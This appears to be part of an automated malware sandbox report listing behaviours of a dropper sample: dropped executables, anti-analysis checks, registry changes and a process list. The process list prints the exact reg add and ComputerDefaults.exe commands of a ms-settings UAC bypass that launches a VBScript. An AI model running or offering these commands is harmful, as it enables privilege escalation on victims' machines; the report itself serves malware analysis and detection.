| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} | C:\Windows\System32\ie4uinit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\filer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1620 set thread context of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4v | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gpp | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2v | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.rmi | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wma | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp3 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpg | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wvx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.midi | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpg | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gpp | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aac | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m3u | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp2v | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wma | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmd | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.aiff | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3g2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mov | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adts | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.au | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.avi | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpe | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wpl | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mid | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpa | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adt | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mod | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpv2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wm | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mod | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wax | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wvx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m4v | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mpv2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m1v | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "4" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.asx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3g2 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.adts | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mov | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4 | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wav | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmd | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmx | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.wmv | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.3gp | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m3u | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.mp4v | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappings\.m2v | C:\Windows\system32\unregmp2.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\" \"%2\" \"%3\" \"%4\"" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shell\Enqueue\ = "&Add to Windows Media Player list" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.3gpp\MP2.Last = "Custom" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF} | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "htmlfile" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\svgfile\shell | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-mpeg\CLSID = "{cd3afa76-b84f-48f0-9393-7edc34128127}" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.xht\Content Type = "application/xhtml+xml" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.wm\OpenWithProgIds\WMP11.AssocFile.ASF = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.aifc\MPlayer2.BAK = "VLC.aifc" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mpg\Extension = ".mp3" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\https\ = "URL:HyperText Transfer Protocol with Privacy" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.m4v\MP2.Last = "Custom" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/wav | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.au\OpenWithProgIds\WMP11.AssocFile.AU = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\ftp\EditFlags = "2" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\MPlayer2.BAK = "VLC.mp4" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpa\OpenWithProgIds\WMP11.AssocFile.MPEG = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shell\Play\command | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.m2v | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MIDI\PreferExecuteOnMismatch = "1" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AU\PreferExecuteOnMismatch = "1" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\http\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/3gpp2 | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\"" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.au\ = "WMP11.AssocFile.AU" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.3gp2\OpenWithProgIds | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-ms-wmv\CLSID = "{cd3afa94-b84f-48f0-9393-7edc34128127}" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Play\ = "&Play with Windows Media Player" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\ = "htmlfile" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.html | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5731" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp4\Extension = ".m4a" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-midi | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\rlogin | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpv2\OpenWithProgIds\WMP11.AssocFile.MPEG = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mp3 | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\open\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5732" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.wax\OpenWithProgIds\WMP11.AssocFile.WAX = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\mshtml.dll\",PrintHTML \"%1\"" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.asx\OpenWithProgIds\WMP11.AssocFile.ASX = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\https\shell | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4v\OpenWithProgIds\WMP11.AssocFile.MP4 = "0" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mpe\MP2.Last = "Custom" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/3gpp2\CLSID = "{cd3afa98-b84f-48f0-9393-7edc34128127}" | C:\Windows\system32\unregmp2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\shellex\IconHandler | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/mid\Extension = ".mid" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\NeverDefault | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.AIFF\PreferExecuteOnMismatch = "1" | C:\Windows\system32\unregmp2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\MUIVerb = "@C:\\Windows\\system32\\ieframe.dll,-5731" | C:\Windows\System32\ie4uinit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Windows\system32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows\system32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows\system32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows\system32\ComputerDefaults.exe | N/A |
| N/A | N/A | C:\Windows\system32\ComputerDefaults.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
"C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
"C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8172.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8172.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\cmd.exe
